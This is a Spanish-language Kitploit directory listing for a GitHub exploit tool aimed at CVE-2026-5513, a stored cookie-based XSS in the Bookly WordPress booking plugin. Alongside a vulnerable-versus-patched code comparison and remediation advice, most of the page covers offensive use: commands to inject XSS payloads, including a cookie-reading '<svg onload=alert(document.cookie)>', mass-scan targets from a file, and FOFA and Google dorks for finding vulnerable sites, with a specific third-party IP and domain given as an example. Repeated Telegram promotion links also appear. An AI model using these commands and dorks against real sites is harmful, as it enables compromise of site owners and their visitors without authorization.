Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-5513 — CVE-2026-5513 — Bookly ≤ 27.2 XSS Almacenado vía Cookie | Kitploit
Herramientas/GitHubGitHub/87achrafg-stack/cve-2026-5513
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHub87achrafg-stack/cve-2026-5513

CVE-2026-5513

CVE-2026-5513 — Bookly ≤ 27.2 XSS Almacenado vía Cookie

Ver Repositorio
4hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-5513 https://t.me/FreeToolsCpa

CVE-2026-5513 — Bookly ≤ 27.2 XSS Almacenado mediante Cookie CVE-2026-5513 — Bookly ≤ 27.2 XSS Almacenado mediante Cookie CVE CVSS Tipo Autenticación https://t.me/FreeToolsCpa Archivo CVE en el grupo
Resumen

CampoValor
ID CVECVE-2026-5513
VulnerabilidadCross-Site Scripting Almacenado (XSS)
PluginBookly — Online Scheduling and Appointment Booking System
Afectado≤ 27.2
Parcheado27.3+
CVSS 3.17.2 (Alta) — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
CWECWE-79
Autenticación RequeridaNinguna
Requisito previoRecordar información personal en cookies debe estar habilitado (deshabilitado por defecto)
Descripción
El plugin Bookly para WordPress es vulnerable a Cross-Site Scripting Almacenado a través de la cookie bookly-customer-full-name en versiones hasta la 27.2 inclusive, debido a un saneamiento de entrada y escape de salida insuficientes.

Cuando la opción "Recordar información personal en cookies" está habilitada, el plugin lee el valor de la cookie bookly-customer-full-name y lo renderiza directamente en el HTML del formulario de reserva sin el escape adecuado. Un atacante no autenticado puede inyectar payloads JavaScript arbitrarios a través de esta cookie que se ejecutan cada vez que un usuario (incluyendo administradores) visita una página que contiene el formulario de reserva de Bookly.

Flujo de ataque Atacante → Establecer cookie maliciosa (bookly-customer-full-name=<script>...</script>) → Visitar página con formulario de reserva de Bookly → El plugin lee la cookie, renderiza el valor sin escapar → El payload XSS se ejecuta en el contexto del navegador de la víctima Causa raíz

root@kitploit:~
// VULNERABLE — Bookly ≤ 27.2
$full_name = $_COOKIE['bookly-customer-full-name'];  // No sanitization
echo '<input type="text" value="' . $full_name . '" />';  // No escaping
// PATCHED — Bookly 27.3+
$full_name = sanitize_text_field($_COOKIE['bookly-customer-full-name']);
echo '<input type="text" value="' . esc_attr($full_name) . '" />';

Características ✓ Sondeo automático de IP/Dominio (HTTP/HTTPS, puertos comunes, detección de redirecciones) ✓ Detección de plugin WordPress y Bookly con verificación de versión ✓ Detección de configuración de cookies (análisis JS de BooklyL10n + reflexión canary) ✓ Pruebas XSS en múltiples contextos (HTML, JavaScript, inyección en atributos) ✓ Inyección de payload con verificación de reflexión ✓ Objetivo único o escaneo masivo desde archivo ✓ Escaneo multi-hilo (hasta 20 hilos) ✓ Soporte de proxy (Burp, etc.) ✓ Guardado automático de resultados vulnerables ✓ Menú interactivo + modos CLI Instalación

root@kitploit:~
pip install requests colorama

Uso Modo CLI

root@kitploit:~
# Check single target
python CVE-2026-5513.py -u https://target.com -v

# Check single IP (auto-probe ports + redirects)
python CVE-2026-5513.py -u 167.99.0.203 -v

# Check + inject XSS payload
python CVE-2026-5513.py -u https://target.com --inject -v

# Custom XSS payload
python CVE-2026-5513.py -u https://target.com --inject --payload "<svg onload=alert(document.cookie)>"

# Mass scan from file
python CVE-2026-5513.py -l targets.txt -t 20 -o vuln.txt

# With Burp proxy
python CVE-2026-5513.py -u https://target.com -v --proxy http://127.0.0.1:8080

Modo interactivo

root@kitploit:~
python CVE-2026-5513.py

Opciones

BanderaDescripción
-u URLObjetivo único (URL, dominio o IP)
-l ARCHIVOArchivo con lista de objetivos (uno por línea)
--injectInyectar payload XSS (por defecto: solo verificar)
--payload CADENAPayload XSS personalizado
-t NNúmero de hilos (por defecto: 10, máximo: 20)
--proxy URLProxy HTTP (ej. http://127.0.0.1:8080)
-o ARCHIVOGuardar resultados en archivo
-vSalida detallada
Formatos de objetivo
La herramienta acepta cualquiera de estos formatos en -u o en el archivo de lista de objetivos:
root@kitploit:~
https://example.com
http://example.com
example.com
192.168.1.100
192.168.1.100:8080

Para IPs simples, la herramienta automáticamente:

  • Sondea puertos 443, 80, 8443, 8080
  • Detecta redirecciones HTTP → HTTPS
  • Detecta redirecciones IP → dominio (ej. 167.99.0.203 → https://book.repairrite.com)
  • Escanea subdirectorios de WordPress (/wp/, /blog/, /wordpress/, etc.)

Cadena de explotación

root@kitploit:~
PASO 0 → Sondear objetivo (IP/dominio → resolver URL base, detectar redirecciones)
PASO 1 → Detectar plugin Bookly (readme.txt, directorio del plugin, assets, verificación de versión)
PASO 2 → Verificar configuración de cookies (análisis JS de BooklyL10n + prueba de reflexión canary)
PASO 3 → Probar reflexión XSS (contexto HTML, contexto JS, contexto de atributo)
PASO 4 → Inyectar payload (si modo --inject, verificar reflexión)

Google Dorks

root@kitploit:~
# FOFA
body="bookly-responsive-appointment-booking-tool"
body="bookly-customer-full-name"
body="bookly-form-group" && body="wp-content/plugins/bookly"

# Google
inurl:"/wp-content/plugins/bookly-responsive-appointment-booking-tool/readme.txt"
intitle:"Book Appointment" inurl:"booking" intext:"bookly"

Remediación

PrioridadAcción
🔴Actualizar Bookly a la versión 27.3+
🟡Deshabilitar "Recordar información personal en cookies" en Configuración de Bookly → General
🟢Implementar reglas WAF para filtrar XSS en valores de cookies
🟢Implementar encabezados de Política de Seguridad de Contenido (CSP)
Referencias
NVD — CVE-2026-5513
Aviso de Wordfence
Tenable
Registro de cambios de Bookly
Descargo de responsabilidad
Esta herramienta se proporciona únicamente para pruebas de seguridad autorizadas y fines educativos. El acceso no autorizado a sistemas informáticos es ilegal. Siempre obtenga la autorización adecuada antes de realizar pruebas. El autor no se responsabiliza por el mal uso de esta herramienta.
https://t.me/FreeToolsCpa https://t.me/FreeToolsCpa https://t.me/FreeToolsCpa
Descargar herramienta